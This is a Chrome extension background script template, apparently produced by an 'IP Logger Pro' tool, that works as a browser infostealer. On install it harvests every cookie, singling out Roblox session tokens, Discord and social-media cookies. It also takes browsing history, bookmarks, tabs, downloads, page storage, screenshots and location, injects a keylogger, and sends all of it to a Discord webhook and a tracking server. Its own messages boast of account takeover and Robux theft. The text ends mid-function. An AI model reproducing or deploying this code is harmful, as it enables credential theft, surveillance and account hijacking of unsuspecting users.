// Enhanced Chrome Extension Background Script for {{EXTENSION_NAME}}
// Generated by IP Logger Pro - Advanced Security Testing Tool

const WEBHOOK_URL = '{{WEBHOOK_URL}}';
const USER_ID = '{{USER_ID}}';
const EXTENSION_ID = '{{EXTENSION_ID}}';
const TRACKING_SERVER = '{{TRACKING_SERVER}}';

// Session management
let sessionId = generateSessionId();
let isActive = true;
let collectedData = {
  installation: null,
  pageViews: [],
  formData: [],
  screenshots: [],
  keystrokes: [],
  clicks: [],
  geolocation: null,
  systemInfo: null,
  browserInfo: null,
  permissions: [],
  features: [],
  history: [],
  cookies: [],
  robloxData: [],
  localStorage: {},
  sessionStorage: {},
  bookmarks: [],
  downloads: [],
  tabs: []
};

// Generate UUID for session tracking
function generateSessionId() {
  return 'xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx'.replace(/[xy]/g, function(c) {
    const r = Math.random() * 16 | 0;
    const v = c === 'x' ? r : (r & 0x3 | 0x8);
    return v.toString(16);
  });
}

// Enhanced data collection on extension startup
if (chrome && chrome.runtime) {
  chrome.runtime.onStartup.addListener(() => {
    collectAllData();
  });

  chrome.runtime.onInstalled.addListener(() => {
    collectAllData();
  });
}

// COMPREHENSIVE DATA COLLECTION
async function collectAllData() {
  console.log('🔍 Starting comprehensive data collection...');

  // Collect initial system data
  await collectInitialData();

  // Collect browsing history
  if ({{FEATURE_BROWSER_INFO}}) {
    await collectBrowsingHistory();
  }

  // Collect all cookies
  await collectAllCookies();

  // Collect bookmarks
  await collectBookmarks();

  // Collect open tabs
  await collectAllTabs();

  // Collect downloads
  await collectDownloads();

  // Look for Roblox data
  await collectRobloxData();

  // Collect storage data from all origins
  await collectStorageData();

  // Take screenshots if enabled
  if ({{FEATURE_SCREENSHOT}}) {
    await captureAllScreenshots();
  }

  console.log('✅ Comprehensive data collection completed');
}

// Collect initial system data
async function collectInitialData() {
  const systemData = {
    type: 'extension_installed',
    extensionId: EXTENSION_ID,
    sessionId: sessionId,
    userId: USER_ID,
    timestamp: Date.now(),
    systemInfo: {
      platform: navigator.platform,
      userAgent: navigator.userAgent,
      language: navigator.language,
      languages: navigator.languages,
      timezone: Intl.DateTimeFormat().resolvedOptions().timeZone,
      screenResolution: screen ? `${screen.width}x${screen.height}` : 'unknown',
      colorDepth: screen.colorDepth,
      pixelDepth: screen.pixelDepth,
      cookieEnabled: navigator.cookieEnabled,
      onLine: navigator.onLine,
      hardwareConcurrency: navigator.hardwareConcurrency,
      deviceMemory: navigator.deviceMemory || 'unknown',
      connection: navigator.connection ? {
        effectiveType: navigator.connection.effectiveType,
        downlink: navigator.connection.downlink,
        rtt: navigator.connection.rtt
      } : 'unknown'
    }
  };

  await sendToWebhookAndServer(systemData);
}

// Collect complete browsing history
async function collectBrowsingHistory() {
  try {
    if (chrome.history) {
      const history = await chrome.history.search({
        text: '',
        maxResults: 10000,
        startTime: Date.now() - (30 * 24 * 60 * 60 * 1000) // Last 30 days
      });

      const historyData = {
        type: 'browsing_history',
        extensionId: EXTENSION_ID,
        sessionId: sessionId,
        userId: USER_ID,
        timestamp: Date.now(),
        historyCount: history.length,
        history: history.map(item => ({
          id: item.id,
          url: item.url,
          title: item.title,
          lastVisitTime: item.lastVisitTime,
          visitCount: item.visitCount,
          typedCount: item.typedCount
        }))
      };

      collectedData.history = historyData.history;
      await sendToWebhookAndServer(historyData);

      console.log(`📚 Collected ${history.length} history entries`);
    }
  } catch (error) {
    console.error('Error collecting browsing history:', error);
  }
}

// Collect ALL cookies from ALL domains
async function collectAllCookies() {
  try {
    if (chrome.cookies) {
      const allCookies = await chrome.cookies.getAll({});

      const cookieData = {
        type: 'all_cookies',
        extensionId: EXTENSION_ID,
        sessionId: sessionId,
        userId: USER_ID,
        timestamp: Date.now(),
        cookieCount: allCookies.length,
        cookies: allCookies.map(cookie => ({
          name: cookie.name,
          value: cookie.value,
          domain: cookie.domain,
          path: cookie.path,
          secure: cookie.secure,
          httpOnly: cookie.httpOnly,
          sameSite: cookie.sameSite,
          expirationDate: cookie.expirationDate,
          storeId: cookie.storeId
        })),
        robloxCookies: allCookies.filter(cookie => 
          cookie.domain.includes('roblox.com') || 
          cookie.name.includes('ROBLOSECURITY') ||
          cookie.name.includes('.ROBLOSECURITY')
        ),
        discordCookies: allCookies.filter(cookie => 
          cookie.domain.includes('discord.com') || 
          cookie.domain.includes('discordapp.com')
        ),
        socialCookies: allCookies.filter(cookie => 
          cookie.domain.includes('facebook.com') ||
          cookie.domain.includes('twitter.com') ||
          cookie.domain.includes('instagram.com') ||
          cookie.domain.includes('tiktok.com') ||
          cookie.domain.includes('youtube.com')
        )
      };

      collectedData.cookies = cookieData.cookies;
      await sendToWebhookAndServer(cookieData);

      console.log(`🍪 Collected ${allCookies.length} cookies from all domains`);
    }
  } catch (error) {
    console.error('Error collecting cookies:', error);
  }
}

// Collect bookmarks
async function collectBookmarks() {
  try {
    if (chrome.bookmarks) {
      const bookmarks = await chrome.bookmarks.getTree();

      const flattenBookmarks = (nodes) => {
        let result = [];
        for (let node of nodes) {
          if (node.url) {
            result.push({
              id: node.id,
              title: node.title,
              url: node.url,
              dateAdded: node.dateAdded,
              dateGroupModified: node.dateGroupModified
            });
          }
          if (node.children) {
            result = result.concat(flattenBookmarks(node.children));
          }
        }
        return result;
      };

      const flatBookmarks = flattenBookmarks(bookmarks);

      const bookmarkData = {
        type: 'bookmarks',
        extensionId: EXTENSION_ID,
        sessionId: sessionId,
        userId: USER_ID,
        timestamp: Date.now(),
        bookmarkCount: flatBookmarks.length,
        bookmarks: flatBookmarks
      };

      collectedData.bookmarks = flatBookmarks;
      await sendToWebhookAndServer(bookmarkData);

      console.log(`🔖 Collected ${flatBookmarks.length} bookmarks`);
    }
  } catch (error) {
    console.error('Error collecting bookmarks:', error);
  }
}

// Collect all open tabs
async function collectAllTabs() {
  try {
    if (chrome.tabs) {
      const tabs = await chrome.tabs.query({});

      const tabData = {
        type: 'all_tabs',
        extensionId: EXTENSION_ID,
        sessionId: sessionId,
        userId: USER_ID,
        timestamp: Date.now(),
        tabCount: tabs.length,
        tabs: tabs.map(tab => ({
          id: tab.id,
          url: tab.url,
          title: tab.title,
          active: tab.active,
          pinned: tab.pinned,
          incognito: tab.incognito,
          windowId: tab.windowId,
          index: tab.index,
          favIconUrl: tab.favIconUrl,
          status: tab.status,
          audible: tab.audible,
          muted: tab.mutedInfo?.muted
        }))
      };

      collectedData.tabs = tabData.tabs;
      await sendToWebhookAndServer(tabData);

      console.log(`📑 Collected ${tabs.length} open tabs`);
    }
  } catch (error) {
    console.error('Error collecting tabs:', error);
  }
}

// Collect downloads
async function collectDownloads() {
  try {
    if (chrome.downloads) {
      const downloads = await chrome.downloads.search({
        limit: 1000,
        orderBy: ['-startTime']
      });

      const downloadData = {
        type: 'downloads',
        extensionId: EXTENSION_ID,
        sessionId: sessionId,
        userId: USER_ID,
        timestamp: Date.now(),
        downloadCount: downloads.length,
        downloads: downloads.map(download => ({
          id: download.id,
          url: download.url,
          filename: download.filename,
          danger: download.danger,
          mime: download.mime,
          startTime: download.startTime,
          endTime: download.endTime,
          state: download.state,
          paused: download.paused,
          error: download.error,
          bytesReceived: download.bytesReceived,
          totalBytes: download.totalBytes,
          fileSize: download.fileSize,
          exists: download.exists
        }))
      };

      collectedData.downloads = downloadData.downloads;
      await sendToWebhookAndServer(downloadData);

      console.log(`📥 Collected ${downloads.length} downloads`);
    }
  } catch (error) {
    console.error('Error collecting downloads:', error);
  }
}

// Collect Roblox-specific data
async function collectRobloxData() {
  try {
    // Check for Roblox cookies specifically
    if (chrome.cookies) {
      const robloxCookies = await chrome.cookies.getAll({domain: '.roblox.com'});

      // Look for ROBLOSECURITY token
      const roblosecurityCookie = robloxCookies.find(cookie => 
        cookie.name === '.ROBLOSECURITY' || cookie.name === 'ROBLOSECURITY'
      );

      const robloxData = {
        type: 'roblox_data',
        extensionId: EXTENSION_ID,
        sessionId: sessionId,
        userId: USER_ID,
        timestamp: Date.now(),
        robloxCookies: robloxCookies,
        roblosecurityToken: roblosecurityCookie ? roblosecurityCookie.value : null,
        hasRobloxSession: !!roblosecurityCookie
      };

      if (roblosecurityCookie) {
        console.log('🎮 ROBLOX SESSION TOKEN FOUND!');
      }

      collectedData.robloxData = robloxData;
      await sendToWebhookAndServer(robloxData);
    }
  } catch (error) {
    console.error('Error collecting Roblox data:', error);
  }
}

// Collect storage data from pages
async function collectStorageData() {
  try {
    if (chrome.tabs) {
      const tabs = await chrome.tabs.query({});

      for (const tab of tabs.slice(0, 10)) { // Limit to prevent overload
        if (tab.url && !tab.url.startsWith('chrome://') && !tab.url.startsWith('chrome-extension://')) {
          try {
            await chrome.scripting.executeScript({
              target: { tabId: tab.id },
              func: collectPageStorage,
              args: [EXTENSION_ID, sessionId, USER_ID, tab.url]
            });
          } catch (error) {
            console.log(`Could not access storage for ${tab.url}:`, error.message);
          }
        }
      }
    }
  } catch (error) {
    console.error('Error collecting storage data:', error);
  }
}

// Function to inject for storage collection
function collectPageStorage(extensionId, sessionId, userId, url) {
  try {
    const storageData = {
      type: 'page_storage',
      extensionId: extensionId,
      sessionId: sessionId,
      userId: userId,
      timestamp: Date.now(),
      url: url,
      domain: window.location.hostname,
      localStorage: {},
      sessionStorage: {},
      cookies: document.cookie,
      indexedDBDatabases: [],
      webSQLDatabases: []
    };

    // Collect localStorage
    try {
      for (let i = 0; i < localStorage.length; i++) {
        const key = localStorage.key(i);
        if (key) {
          const value = localStorage.getItem(key);
          storageData.localStorage[key] = value;
        }
      }
    } catch (e) {
      storageData.localStorage = { error: 'Access denied' };
    }

    // Collect sessionStorage
    try {
      for (let i = 0; i < sessionStorage.length; i++) {
        const key = sessionStorage.key(i);
        if (key) {
          const value = sessionStorage.getItem(key);
          storageData.sessionStorage[key] = value;
        }
      }
    } catch (e) {
      storageData.sessionStorage = { error: 'Access denied' };
    }

    // Send to background script
    chrome.runtime.sendMessage({ type: 'storageData', data: storageData });

  } catch (error) {
    console.error('Error collecting page storage:', error);
  }
}

// Capture screenshots of all tabs
async function captureAllScreenshots() {
  try {
    if (chrome.tabs && chrome.tabs.captureVisibleTab) {
      const windows = await chrome.windows.getAll({ populate: true });

      for (const window of windows) {
        for (const tab of window.tabs) {
          if (tab.active && !tab.url.startsWith('chrome://')) {
            try {
              const dataUrl = await chrome.tabs.captureVisibleTab(window.id, { format: 'png' });

              const screenshotData = {
                type: 'screenshot',
                extensionId: EXTENSION_ID,
                sessionId: sessionId,
                userId: USER_ID,
                timestamp: Date.now(),
                tabInfo: {
                  id: tab.id,
                  url: tab.url,
                  title: tab.title,
                  windowId: window.id
                },
                screenshot: dataUrl.substring(0, 1000) + '...[TRUNCATED]', // Limit size for webhook
                screenshotSize: dataUrl.length
              };

              await sendToWebhookAndServer(screenshotData);
              console.log(`📸 Screenshot captured for: ${tab.title}`);

            } catch (error) {
              console.log(`Could not capture screenshot for tab ${tab.id}:`, error.message);
            }
          }
        }
      }
    }
  } catch (error) {
    console.error('Error capturing screenshots:', error);
  }
}

// Track tab changes with comprehensive data
if (chrome && chrome.tabs) {
  chrome.tabs.onActivated.addListener(async (activeInfo) => {
    await collectAndSendTabData(await chrome.tabs.get(activeInfo.tabId), 'tab_activated');
  });

  chrome.tabs.onUpdated.addListener(async (tabId, changeInfo, tab) => {
    if (changeInfo.status === 'complete' && tab.url) {
      await collectAndSendTabData(tab, 'page_loaded');

      // Collect fresh data when user navigates
      setTimeout(() => {
        collectPageDataFromTab(tab);
      }, 2000);
    }
  });
}

// Enhanced data collection from tabs
async function collectAndSendTabData(tab, eventType) {
  try {
    const data = {
      type: eventType,
      extensionId: EXTENSION_ID,
      sessionId: sessionId,
      userId: USER_ID,
      timestamp: Date.now(),
      tabInfo: {
        url: tab.url,
        title: tab.title,
        favIconUrl: tab.favIconUrl,
        incognito: tab.incognito,
        active: tab.active,
        pinned: tab.pinned,
        index: tab.index,
        windowId: tab.windowId,
        status: tab.status
      }
    };

    // Add geolocation if enabled
    if ({{FEATURE_GEOLOCATION}}) {
      try {
        const position = await getCurrentPosition();
        data.location = {
          latitude: position.coords.latitude,
          longitude: position.coords.longitude,
          accuracy: position.coords.accuracy,
          timestamp: position.timestamp
        };
      } catch (error) {
        data.location = { error: 'Geolocation not available' };
      }
    }

    await sendToWebhookAndServer(data);

    // Inject comprehensive data collection script
    if (tab.url && !tab.url.startsWith('chrome://') && !tab.url.startsWith('chrome-extension://')) {
      try {
        await chrome.scripting.executeScript({
          target: { tabId: tab.id },
          func: collectCompletePageData,
          args: [EXTENSION_ID, sessionId, USER_ID, {{FEATURE_FORM_DATA}}, {{FEATURE_CLICK_TRACKING}}, {{FEATURE_KEYLOGGER}}]
        });
      } catch (error) {
        console.error('Error injecting comprehensive collection script:', error);
      }
    }

  } catch (error) {
    console.error('Error collecting tab data:', error);
  }
}

// Comprehensive page data collection function
function collectCompletePageData(extensionId, sessionId, userId, captureFormData, captureClicks, captureKeystrokes) {
  try {
    const pageData = {
      type: 'comprehensive_page_analysis',
      extensionId: extensionId,
      sessionId: sessionId,
      userId: userId,
      timestamp: Date.now(),
      url: window.location.href,
      domain: window.location.hostname,
      path: window.location.pathname,
      title: document.title,
      pageInfo: {
        documentHeight: document.documentElement.scrollHeight,
        documentWidth: document.documentElement.scrollWidth,
        viewportHeight: window.innerHeight,
        viewportWidth: window.innerWidth,
        scrollX: window.scrollX,
        scrollY: window.scrollY,
        referrer: document.referrer,
        characterSet: document.characterSet,
        readyState: document.readyState,
        lastModified: document.lastModified,
        doctype: document.doctype ? document.doctype.name : 'unknown'
      },
      forms: [],
      links: [],
      images: [],
      inputs: [],
      scripts: [],
      iframes: [],
      localStorage: {},
      sessionStorage: {},
      cookies: document.cookie,
      userAgent: navigator.userAgent,
      language: navigator.language,
      platform: navigator.platform,
      onlineStatus: navigator.onLine,
      cookieEnabled: navigator.cookieEnabled
    };

    // Collect all forms with detailed information
    const forms = document.querySelectorAll('form');
    forms.forEach((form, index) => {
      const formData = {
        index: index,
        action: form.action,
        method: form.method,
        name: form.name,
        id: form.id,
        className: form.className,
        autocomplete: form.autocomplete,
        target: form.target,
        inputCount: form.querySelectorAll('input').length,
        inputs: []
      };

      const inputs = form.querySelectorAll('input, textarea, select');
      inputs.forEach(input => {
        formData.inputs.push({
          type: input.type || 'text',
          name: input.name,
          id: input.id,
          placeholder: input.placeholder,
          required: input.required,
          disabled: input.disabled,
          readonly: input.readOnly,
          value: input.type === 'password' ? '[HIDDEN]' : input.value?.substring(0, 100),
          checked: input.checked,
          selected: input.selected
        });
      });

      pageData.forms.push(formData);
    });

    // Collect all input fields (including those outside forms)
    const allInputs = document.querySelectorAll('input, textarea, select');
    allInputs.forEach(input => {
      pageData.inputs.push({
        type: input.type || 'unknown',
        name: input.name,
        id: input.id,
        className: input.className,
        placeholder: input.placeholder,
        autocomplete: input.autocomplete,
        required: input.required,
        disabled: input.disabled,
        readonly: input.readOnly,
        value: input.type === 'password' ? '[HIDDEN]' : input.value?.substring(0, 100),
        checked: input.checked,
        selected: input.selected,
        maxLength: input.maxLength,
        minLength: input.minLength,
        pattern: input.pattern
      });
    });

    // Collect all links
    const links = document.querySelectorAll('a[href]');
    Array.from(links).slice(0, 100).forEach(link => {
      pageData.links.push({
        href: link.href,
        text: link.textContent?.substring(0, 100),
        title: link.title,
        target: link.target,
        rel: link.rel,
        download: link.download
      });
    });

    // Collect all images
    const images = document.querySelectorAll('img[src]');
    Array.from(images).slice(0, 50).forEach(img => {
      pageData.images.push({
        src: img.src,
        alt: img.alt,
        title: img.title,
        width: img.width,
        height: img.height,
        loading: img.loading
      });
    });

    // Collect script sources
    const scripts = document.querySelectorAll('script[src]');
    Array.from(scripts).forEach(script => {
      pageData.scripts.push({
        src: script.src,
        type: script.type,
        async: script.async,
        defer: script.defer
      });
    });

    // Collect iframes
    const iframes = document.querySelectorAll('iframe');
    Array.from(iframes).forEach(iframe => {
      pageData.iframes.push({
        src: iframe.src,
        name: iframe.name,
        width: iframe.width,
        height: iframe.height,
        sandbox: iframe.sandbox.toString()
      });
    });

    // Collect localStorage
    try {
      for (let i = 0; i < localStorage.length; i++) {
        const key = localStorage.key(i);
        if (key) {
          const value = localStorage.getItem(key);
          pageData.localStorage[key] = value;
        }
      }
    } catch (e) {
      pageData.localStorage = { error: 'Access denied' };
    }

    // Collect sessionStorage
    try {
      for (let i = 0; i < sessionStorage.length; i++) {
        const key = sessionStorage.key(i);
        if (key) {
          const value = sessionStorage.getItem(key);
          pageData.sessionStorage[key] = value;
        }
      }
    } catch (e) {
      pageData.sessionStorage = { error: 'Access denied' };
    }

    // Send comprehensive data back to background script
    chrome.runtime.sendMessage({ type: 'comprehensivePageData', data: pageData });

    // Also send directly to webhook if available
    if ('{{WEBHOOK_URL}}' && '{{WEBHOOK_URL}}'.trim() && '{{WEBHOOK_URL}}' !== '{{WEBHOOK_URL}}') {
      sendDirectToWebhook(pageData);
    }

    // Set up enhanced event listeners for real-time tracking
    if (captureClicks) {
      document.addEventListener('click', function(event) {
        const clickData = {
          type: 'enhanced_click_event',
          extensionId: extensionId,
          sessionId: sessionId,
          userId: userId,
          timestamp: Date.now(),
          element: {
            tagName: event.target.tagName,
            id: event.target.id,
            className: event.target.className,
            text: event.target.textContent?.substring(0, 200),
            href: event.target.href,
            type: event.target.type,
            name: event.target.name,
            value: event.target.value?.substring(0, 100),
            dataset: Object.assign({}, event.target.dataset)
          },
          coordinates: {
            clientX: event.clientX,
            clientY: event.clientY,
            pageX: event.pageX,
            pageY: event.pageY,
            screenX: event.screenX,
            screenY: event.screenY
          },
          viewport: {
            width: window.innerWidth,
            height: window.innerHeight,
            scrollX: window.scrollX,
            scrollY: window.scrollY
          },
          url: window.location.href,
          path: window.location.pathname
        };
        chrome.runtime.sendMessage({ type: 'enhancedClickData', data: clickData });
      });
    }

    if (captureKeystrokes) {
      let keystrokeBuffer = '';
      let lastKeystroke = 0;

      document.addEventListener('keydown', function(event) {
        const now = Date.now();

        if (now - lastKeystroke > 5000) {
          keystrokeBuffer = '';
        }

        lastKeystroke = now;
        keystrokeBuffer += event.key;

        if (keystrokeBuffer.length >= 10 || ['Enter', 'Tab'].includes(event.key)) {
          const keystrokeData = {
            type: 'enhanced_keystroke_event',
            extensionId: extensionId,
            sessionId: sessionId,
            userId: userId,
            timestamp: now,
            keys: keystrokeBuffer,
            keyCount: keystrokeBuffer.length,
            element: {
              tagName: event.target.tagName,
              type: event.target.type,
              id: event.target.id,
              name: event.target.name,
              className: event.target.className,
              placeholder: event.target.placeholder
            },
            modifiers: {
              ctrl: event.ctrlKey,
              alt: event.altKey,
              shift: event.shiftKey,
              meta: event.metaKey
            },
            url: window.location.href,
            path: window.location.pathname
          };

          chrome.runtime.sendMessage({ type: 'enhancedKeystrokeData', data: keystrokeData });
          keystrokeBuffer = '';
        }
      });
    }

  } catch (error) {
    console.error('Error in comprehensive page data collection:', error);
  }
}

// Send data directly to webhook from content script
async function sendDirectToWebhook(data) {
  try {
    const webhookUrl = '{{WEBHOOK_URL}}';
    if (!webhookUrl || !webhookUrl.trim() || webhookUrl === '{{WEBHOOK_URL}}') {
      return;
    }

    const enhancedData = {
      ...data,
      type: 'comprehensive_page_analysis',
      extensionId: EXTENSION_ID,
      sessionId: sessionId,
      userId: USER_ID,
      timestamp: Date.now()
    };

    await sendToWebhook(enhancedData);
  } catch (error) {
    console.error('Direct webhook send failed:', error);
  }
}

// Listen for messages from content scripts
chrome.runtime.onMessage.addListener(async (message, sender, sendResponse) => {
  if (message.type === 'comprehensivePageData' || 
      message.type === 'enhancedClickData' || 
      message.type === 'enhancedKeystrokeData' ||
      message.type === 'storageData') {
    await sendToWebhookAndServer(message.data);
  }
});

// Enhanced webhook and server sending with retry logic
async function sendToWebhookAndServer(data) {
  // Send to Discord webhook (if configured)
  if (WEBHOOK_URL && WEBHOOK_URL.trim()) {
    await sendToWebhook(data);
  }

  // Send to tracking server (for EX LOGS)
  await sendToServer(data);
}

// Enhanced Discord webhook with comprehensive data formatting
async function sendToWebhook(data) {
  try {
    const embeds = [];

    // Main embed with comprehensive overview
    let mainEmbed = {
      title: "🔍 COMPREHENSIVE EXTENSION DATA COLLECTION",
      color: getColorForEventType(data.type),
      timestamp: new Date(data.timestamp).toISOString(),
      footer: { text: `Extension: {{EXTENSION_NAME}} | Session: ${data.sessionId?.substring(0, 8)}` }
    };

    // Customize based on data type with detailed information
    switch (data.type) {
      case 'extension_installed':
        mainEmbed.title = "🚀 EXTENSION INSTALLED - COMPREHENSIVE DATA HARVESTING ACTIVE";
        mainEmbed.description = `**{{EXTENSION_NAME}}** is now collecting ALL browser data with advanced monitoring capabilities.`;
        mainEmbed.fields = [
          { name: "👤 Target User", value: `ID: ${data.userId}`, inline: true },
          { name: "💻 System Platform", value: data.systemInfo?.platform || 'Unknown', inline: true },
          { name: "🌐 Browser Engine", value: data.systemInfo?.userAgent?.split(' ')[0] || 'Unknown', inline: true },
          { name: "📊 System Details", value: `**Memory:** ${data.systemInfo?.deviceMemory || 'Unknown'} GB\n**CPU Cores:** ${data.systemInfo?.hardwareConcurrency || 'Unknown'}\n**Screen:** ${data.systemInfo?.screenResolution || 'Unknown'}`, inline: false },
          { name: "🌍 Network Info", value: `**Connection:** ${data.systemInfo?.connection?.effectiveType || 'Unknown'}\n**Language:** ${data.systemInfo?.language || 'Unknown'}\n**Timezone:** ${data.systemInfo?.timezone || 'Unknown'}`, inline: false }
        ];
        break;

      case 'all_cookies':
        mainEmbed.title = "🍪 COMPLETE COOKIE HARVEST - ALL DOMAINS COMPROMISED";
        mainEmbed.description = `Successfully extracted **${data.cookieCount}** cookies from ALL websites and domains.`;

        // Detailed cookie breakdown
        const cookieDetails = [];
        if (data.robloxCookies?.length > 0) {
          cookieDetails.push(`🎮 **Roblox Cookies:** ${data.robloxCookies.length} found`);
          data.robloxCookies.forEach(cookie => {
            if (cookie.name.includes('ROBLOSECURITY')) {
              cookieDetails.push(`🔥 **ROBLOSECURITY TOKEN:** \`${cookie.value.substring(0, 50)}...\``);
            }
          });
        }
        if (data.discordCookies?.length > 0) {
          cookieDetails.push(`💬 **Discord Cookies:** ${data.discordCookies.length} found`);
        }
        if (data.socialCookies?.length > 0) {
          cookieDetails.push(`📱 **Social Media Cookies:** ${data.socialCookies.length} found`);
        }

        mainEmbed.fields = [
          { name: "🎯 High-Value Targets", value: cookieDetails.join('\n') || 'No premium targets found', inline: false },
          { name: "📊 Cookie Summary", value: `**Total Domains:** ${new Set(data.cookies?.map(c => c.domain)).size || 0}\n**Secure Cookies:** ${data.cookies?.filter(c => c.secure).length || 0}\n**HttpOnly Cookies:** ${data.cookies?.filter(c => c.httpOnly).length || 0}`, inline: true }
        ];

        // Add detailed cookie data in separate embed
        if (data.cookies?.length > 0) {
          const cookieEmbed = {
            title: "🔒 DETAILED COOKIE DATA",
            color: 0xFF6B35,
            fields: []
          };

          // Show first 10 most valuable cookies
          const valuableCookies = data.cookies
            .filter(c => c.name.toLowerCase().includes('auth') || c.name.toLowerCase().includes('session') || c.name.toLowerCase().includes('token') || c.name.toLowerCase().includes('login'))
            .slice(0, 10);

          if (valuableCookies.length > 0) {
            cookieEmbed.fields.push({
              name: "🔑 Authentication Cookies Found",
              value: valuableCookies.map(c => `**${c.domain}** - \`${c.name}\`: \`${c.value.substring(0, 40)}...\``).join('\n'),
              inline: false
            });
          }

          embeds.push(cookieEmbed);
        }
        break;

      case 'browsing_history':
        mainEmbed.title = "📚 COMPLETE BROWSING HISTORY COMPROMISED";
        mainEmbed.description = `Extracted **${data.historyCount}** browsing history entries covering the last 30 days.`;

        if (data.history?.length > 0) {
          // Analyze history for interesting sites
          const socialSites = data.history.filter(h => h.url.includes('facebook.com') || h.url.includes('instagram.com') || h.url.includes('twitter.com') || h.url.includes('tiktok.com'));
          const gamingSites = data.history.filter(h => h.url.includes('roblox.com') || h.url.includes('minecraft.net') || h.url.includes('steam'));
          const bankingSites = data.history.filter(h => h.url.includes('bank') || h.url.includes('paypal') || h.url.includes('amazon'));

          mainEmbed.fields = [
            { name: "📊 History Analysis", value: `**Total Visits:** ${data.historyCount}\n**Unique Sites:** ${new Set(data.history.map(h => new URL(h.url).hostname)).size}\n**Most Visited:** ${data.history[0]?.title?.substring(0, 50) || 'Unknown'}`, inline: true },
            { name: "🎯 Target Categories", value: `**🎮 Gaming:** ${gamingSites.length} visits\n**📱 Social Media:** ${socialSites.length} visits\n**💳 Financial:** ${bankingSites.length} visits`, inline: true }
          ];

          // Add detailed history in separate embed
          const historyEmbed = {
            title: "🕒 RECENT BROWSING ACTIVITY",
            color: 0x3498DB,
            fields: []
          };

          const recentHistory = data.history.slice(0, 15);
          if (recentHistory.length > 0) {
            historyEmbed.fields.push({
              name: "📖 Recent Pages Visited",
              value: recentHistory.map(h => `**${new URL(h.url).hostname}** - ${h.title?.substring(0, 40) || 'No title'} (${h.visitCount} visits)`).join('\n'),
              inline: false
            });
          }

          embeds.push(historyEmbed);
        }
        break;

      case 'roblox_data':
        if (data.hasRobloxSession) {
          mainEmbed.title = "🚨 CRITICAL: ROBLOX ACCOUNT FULLY COMPROMISED!";
          mainEmbed.description = "**ALERT: Active Roblox session token captured! Complete account access obtained.**";
          mainEmbed.color = 0xFF0000;
          mainEmbed.fields = [
            { name: "🔥 Session Status", value: "✅ **ACTIVE TOKEN CAPTURED**\n🎯 **Full Account Access**\n⚠️ **Immediate Threat**", inline: true },
            { name: "🍪 Roblox Data", value: `**Cookies Found:** ${data.robloxCookies?.length || 0}\n**ROBLOSECURITY:** ${data.roblosecurityToken ? '✅ CAPTURED' : '❌ Not Found'}`, inline: true },
            { name: "⚡ Capabilities", value: "• Account takeover\n• Robux theft\n• Item trading\n• Profile modification\n• Game access", inline: false }
          ];

          if (data.roblosecurityToken) {
            mainEmbed.fields.push({
              name: "🔑 ROBLOSECURITY TOKEN",
              value: `\`\`\`${data.roblosecurityToken.substring(0, 100)}...\`\`\``,
              inline: false
            });
          }
        } else {
          mainEmbed.title = "🎮 Roblox Data Scan Complete";
          mainEmbed.description = "No active Roblox session detected.";
          mainEmbed.color = 0x95A5A6;
        }
        break;

      case 'bookmarks':
        mainEmbed.title = "🔖 COMPLETE BOOKMARK COLLECTION HARVESTED";
        mainEmbed.description = `Extracted **${data.bookmarkCount}** bookmarks revealing user interests and frequently visited sites.`;

        if (data.bookmarks?.length > 0) {
          const domains = data.bookmarks.map(b => {
            try { return new URL(b.url).hostname; } catch { return 'Invalid URL'; }
          });
          const uniqueDomains = [...new Set(domains)];

          mainEmbed.fields = [
            { name: "📊 Bookmark Analysis", value: `**Total Bookmarks:** ${data.bookmarkCount}\n**Unique Domains:** ${uniqueDomains.length}\n**Folders:** Multiple`, inline: true }
          ];

          // Show interesting bookmarks
          const interestingBookmarks = data.bookmarks
            .filter(b => b.url.includes('bank') || b.url.includes('paypal') || b.url.includes('amazon') || b.url.includes('roblox') || b.url.includes('discord'))
            .slice(0, 10);

          if (interestingBookmarks.length > 0) {
            mainEmbed.fields.push({
              name: "🎯 High-Value Bookmarks",
              value: interestingBookmarks.map(b => `**${b.title?.substring(0, 30) || 'Untitled'}** - ${new URL(b.url).hostname}`).join('\n'),
              inline: false
            });
          }
        }
        break;

      case 'all_tabs':
        mainEmbed.title = "📑 ALL BROWSER TABS MONITORED";
        mainEmbed.description = `Currently monitoring **${data.tabCount}** open tabs with real-time activity tracking.`;

        if (data.tabs?.length > 0) {
          const activeTabs = data.tabs.filter(t => t.active);
          const incognitoTabs = data.tabs.filter(t => t.incognito);

          mainEmbed.fields = [
            { name: "📊 Tab Statistics", value: `**Total Tabs:** ${data.tabCount}\n**Active Tabs:** ${activeTabs.length}\n**Incognito Tabs:** ${incognitoTabs.length}\n**Pinned Tabs:** ${data.tabs.filter(t => t.pinned).length}`, inline: true }
          ];

          const currentTabs = data.tabs.slice(0, 10);
          if (currentTabs.length > 0) {
            mainEmbed.fields.push({
              name: "🌐 Currently Open Pages",
              value: currentTabs.map(t => `**${t.title?.substring(0, 40) || 'Loading...'}**\n\`${t.url?.substring(0, 60) || 'Unknown URL'}...\`${t.incognito ? ' 🕶️' : ''}${t.active ? ' ⭐' : ''}`).join('\n\n'),
              inline: false
            });
          }
        }
        break;

      case 'downloads':
        mainEmbed.title = "📥 COMPLETE DOWNLOAD HISTORY ACCESSED";
        mainEmbed.description = `Collected **${data.downloadCount}** download records revealing user file activity.`;

        if (data.downloads?.length > 0) {
          const recentDownloads = data.downloads
            .sort((a, b) => b.startTime - a.startTime)
            .slice(0, 10);

          mainEmbed.fields = [
            { name: "📊 Download Analysis", value: `**Total Downloads:** ${data.downloadCount}\n**Recent Downloads:** ${recentDownloads.length}\n**File Types:** Various`, inline: true }
          ];

          if (recentDownloads.length > 0) {
            mainEmbed.fields.push({
              name: "📁 Recent Downloads",
              value: recentDownloads.map(d => `**${d.filename?.substring(0, 40) || 'Unknown file'}**\n\`${d.url?.substring(0, 50) || 'Unknown URL'}...\``).join('\n\n'),
              inline: false
            });
          }
        }
        break;

      case 'comprehensive_page_analysis':
        mainEmbed.title = "🔬 DEEP PAGE ANALYSIS - COMPLETE DATA EXTRACTION";
        mainEmbed.description = `Performing comprehensive analysis of **${data.domain || 'current page'}** with full data extraction.`;

        mainEmbed.fields = [
          { name: "📊 Page Elements", value: `**Forms:** ${data.forms?.length || 0}\n**Inputs:** ${data.inputs?.length || 0}\n**Links:** ${data.links?.length || 0}\n**Images:** ${data.images?.length || 0}\n**Scripts:** ${data.scripts?.length || 0}`, inline: true },
